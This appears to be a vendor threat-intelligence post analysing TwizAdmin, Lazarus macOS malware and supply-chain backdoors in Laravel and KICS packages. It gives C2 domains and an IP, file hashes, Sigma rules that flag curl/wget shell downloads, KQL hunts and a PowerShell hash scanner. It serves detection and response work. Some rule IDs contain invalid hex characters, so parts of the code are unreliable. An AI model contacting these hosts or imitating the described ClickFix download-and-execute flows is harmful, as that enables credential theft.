Back to Intelligence

TwizAdmin MaaS, Lazarus Mach-O Man & Supply Chain Poisoning: OTX Pulse Analysis

SA
Security Arsenal Team
May 26, 2026
5 min read

Threat Summary

Recent OTX pulses indicate a coordinated convergence of credential theft and supply chain compromise campaigns. Security teams must contend with the DataBreachPlus group deploying the TwizAdmin Malware-as-a-Service (MaaS) kit, which combines crypto-clipping, Java RATs, and ransomware modules. Simultaneously, the Lazarus Group is actively targeting the Finance and Technology sectors with the "Mach-O Man" malware kit via ClickFix attacks, while Cloud Atlas continues espionage operations against government entities in Belarus and Russia using PowerCloud backdoors. A critical vector involves supply chain poisoning, specifically in Laravel Lang packages and Checkmarx KICS Docker images, introducing backdoors for credential exfiltration.

Threat Actor / Malware Profile

DataBreachPlus (TwizAdmin / crpx0)

  • Distribution: Phishing campaigns impersonating FedEx; targets Windows and macOS.
  • Payload Behavior: Multi-stage malware featuring a clipboard hijacker for 8+ cryptocurrency chains, BIP-39 seed phrase theft, and browser credential exfiltration. Includes a ransomware module (crpx0).
  • C2 Communication: Managed via a FastAPI-based panel at 103.241.66[.]238:1337.

Lazarus Group (Mach-O Man / PyLangGhostRAT)

  • Distribution: Telegram messages containing fake meeting invitations (Zoom/Teams) redirecting to fraudulent collaboration platforms employing ClickFix social engineering.
  • Payload Behavior: macOS-specific malware kit. Triggers terminal commands to download and execute PyLangGhostRAT, a Python-based infostealer targeting browser credentials and session data.
  • Persistence: Uses LaunchAgents or cron jobs; exfiltration via Telegram.

Cloud Atlas (Inception Framework)

  • Distribution: Spear-phishing with malicious ZIP archives containing LNK shortcuts.
  • Payload Behavior: Deploying VBScript and PowerShell-based backdoors (VBCloud, PowerShower) for network reconnaissance and file theft (PowerCloud).
  • Targets: Government entities and commercial companies in Russia and Belarus.

TeamPCP (Supply Chain)

  • Distribution: Compromised Docker Hub images (checkmarx/kics) and VS Code extensions.
  • Payload Behavior: mcpAddon.js and Canister Worm trojanizing binaries to steal infrastructure-as-code credentials and scan reports.

IOC Analysis

The provided pulses contain a mix of network and file-based indicators:

  • Domains: Key C2 and payload delivery domains include fanonlyatn.xyz (TwizAdmin), livemicrosft.com (Lazarus typo-squatting), and flipboxstudio.info (Laravel exfiltration).
  • File Hashes: Numerous SHA256 hashes associated with Mach-O binaries (Mach-O Man), Windows droppers (TwizAdmin), and poisoned Docker images (KICS).
  • Operationalization: SOC teams should immediately block listed domains at the perimeter. File hashes should be uploaded to EDR solutions for hunting; the presence of helpers.php in Laravel environments or mcpAddon.js in VS Code extensions indicates compromise.

Detection Engineering

YAML
---
title: Suspicious macOS Script Execution via Terminal (Lazarus Mach-O Man)
id: b4b3a7a8-9b2c-4d1a-8f3e-6a5b4c3d2e1f
description: Detects execution of suspicious shell commands often used in ClickFix attacks to download payloads, such as curl piping to bash, spawned by common communication apps or browsers.
status: experimental
date: 2026/05/26
author: Security Arsenal
references:
    - https://any.run/cybersecurity-blog/lazarus-macos-malware-mach-o-man/
tags:
    - attack.execution
    - attack.t1059.004
logsource:
    product: macos
    category: process_creation
detection:
    selection:
        Image|endswith:
            - '/bin/sh'
            - '/bin/bash'
            - '/bin/zsh'
        CommandLine|contains:
            - 'curl '
            - 'wget '
    filter_legit_dev:
        ParentImage|endswith:
            - '/Xcode.app/'
            - '/Visual Studio Code.app/'
    condition: selection and not filter_legit_dev
falsepositives:
    - Legitimate developer scripts
level: high
---
title: Potential Laravel Backdoor Activity (helpers.php)
id: c5c4b8b9-0c3d-4e2a-9f0g-7b6c5d4e3f2g
description: Detects execution or modification of the known malicious backdoor file helpers.php identified in compromised Laravel Lang packages.
status: experimental
date: 2026/05/26
author: Security Arsenal
references:
    - https://socket.dev/blog/laravel-lang-compromise
tags:
    - attack.persistence
    - attack.t1505.003
logsource:
    product: linux
    category: file_event
detection:
    selection:
        TargetFilename|contains: '/helpers.php'
        TargetFilename|contains:
            - '/vendor/'
            - '/lang/'
    condition: selection
falsepositives:
    - Legitimate use of helper files (verify signature)
level: critical
---
title: Infostealer C2 Communication via Known Domains
id: d6d5c9c0-1d4e-5f3b-0g1h-8c7d6e5f4g3h
description: Detects network connections to domains associated with TwizAdmin and Lazarus Mach-O Man campaigns based on recent OTX pulses.
status: experimental
date: 2026/05/26
author: Security Arsenal
references:
    - https://intel.breakglass.tech/post/twizadmin-103-241-66
    - https://any.run/cybersecurity-blog/lazarus-macos-malware-mach-o-man/
tags:
    - attack.command_and_control
    - attack.t1071.001
logsource:
    category: network_connection
detection:
    selection:
        DestinationHostname|contains:
            - 'fanonlyatn.xyz'
            - 'livemicrosft.com'
            - 'flipboxstudio.info'
    condition: selection
falsepositives:
    - Unknown
level: critical


kql
// Hunt for network connections to TwizAdmin, Lazarus, or Laravel C2 domains
DeviceNetworkEvents
| where Timestamp > ago(1d)
| where RemoteUrl has "fanonlyatn.xyz" 
   or RemoteUrl has "livemicrosft.com" 
   or RemoteUrl has "flipboxstudio.info"
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP

// Hunt for file creations related to Mach-O Man or TwizAdmin hashes (placeholder for specific hashes)
DeviceFileEvents
| where Timestamp > ago(1d)
| where SHA256 in (
    "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092", 
    "0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90",
    "222e6bfed0f3bb1937bf5e719a2342871ccd683ff1c0cb967c8e31ea58beaf7b"
)
| project Timestamp, DeviceName, FileName, FolderPath, SHA256, InitiatingProcessAccountName


powershell
# IOC Hunt Script for TwizAdmin, Mach-O Man, and KICS Indicators
$TargetHashes = @(
    "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092",
    "3fcd267e811d9b83cafa3d8d6932fa1c56f4fd8dcf46f9ec346e0689439532d4",
    "0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90",
    "222e6bfed0f3bb1937bf5e719a2342871ccd683ff1c0cb967c8e31ea58beaf7b"
)

Write-Host "[+] Scanning for known malicious file hashes..." -ForegroundColor Cyan

$Drives = Get-PSDrive -PSProvider FileSystem | Select-Object -ExpandProperty Root

foreach ($Drive in $Drives) {
    Write-Host "Scanning $Drive..." -ForegroundColor Yellow
    Get-ChildItem -Path $Drive -Recurse -ErrorAction SilentlyContinue | 
    Where-Object { -not $_.PSIsContainer } | 
    ForEach-Object {
        $FileHash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
        if ($TargetHashes -contains $FileHash) {
            Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName)" -ForegroundColor Red
        }
    }
}

Write-Host "[+] Checking for Laravel backdoor helpers.php..." -ForegroundColor Cyan
$WebPaths = @("C:\inetpub", "D:\inetpub", "C:\xampp")
foreach ($Path in $WebPaths) {
    if (Test-Path $Path) {
        Get-ChildItem -Path $Path -Filter "helpers.php" -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
            Write-Host "[!] Suspicious helpers.php found at: $($_.FullName)" -ForegroundColor Red
        }
    }
}

Response Priorities

  • Immediate:

    • Block all listed domains (fanonlyatn.xyz, livemicrosft.com, flipboxstudio.info, allgoodsdirect.com.au) at the proxy and firewall.
    • Scan all endpoints for the provided SHA256 file hashes.
    • Identify and quarantine any systems with checkmarx/kics Docker images or KICS VS Code extensions versions 1.17.0, 1.19.0, or Docker tags v2.1.20, v2.1.21.

  • 24 Hours:

    • Initiate credential reset for accounts accessed from endpoints flagged with infostealer indicators (browser credential dumping).
    • Audit Laravel projects for the compromised laravel-lang/lang versions; force update to clean versions.
    • Review logs for access to flipboxstudio.info (Laravel exfiltration).

  • 1 Week:

    • Implement strict allow-listing for IDE extensions and Docker image registries.
    • Conduct security awareness training focused on "ClickFix" social engineering and fake meeting invitations.
    • Enforce YubiKey or FIDO2 authentication for developer accounts to mitigate phishing-based supply chain takeovers.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-credentialstwizadminlazarus-groupsupply-chain-attackinfostealercloud-atlas

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action